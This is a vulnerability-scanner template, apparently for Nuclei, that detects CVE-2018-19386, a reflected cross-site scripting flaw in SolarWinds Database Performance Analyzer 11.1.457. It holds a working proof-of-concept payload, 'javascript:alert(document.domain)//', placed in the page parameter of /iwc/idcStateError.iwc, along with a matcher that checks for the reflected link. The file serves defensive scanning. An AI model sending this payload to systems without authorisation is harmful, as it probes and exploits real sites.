id: CVE-2018-19386

info:
  name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
  author: pikpikcu
  severity: medium
  description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button
    on the page, aka a /iwc/idcStateError.iwc?page= URI.
  reference:
    - https://www.cvedetails.com/cve/CVE-2018-19386/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-19386
    cwe-id: CWE-79
  tags: cve,cve2018,solarwinds,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '<a href="javascript:alert(document.domain)//'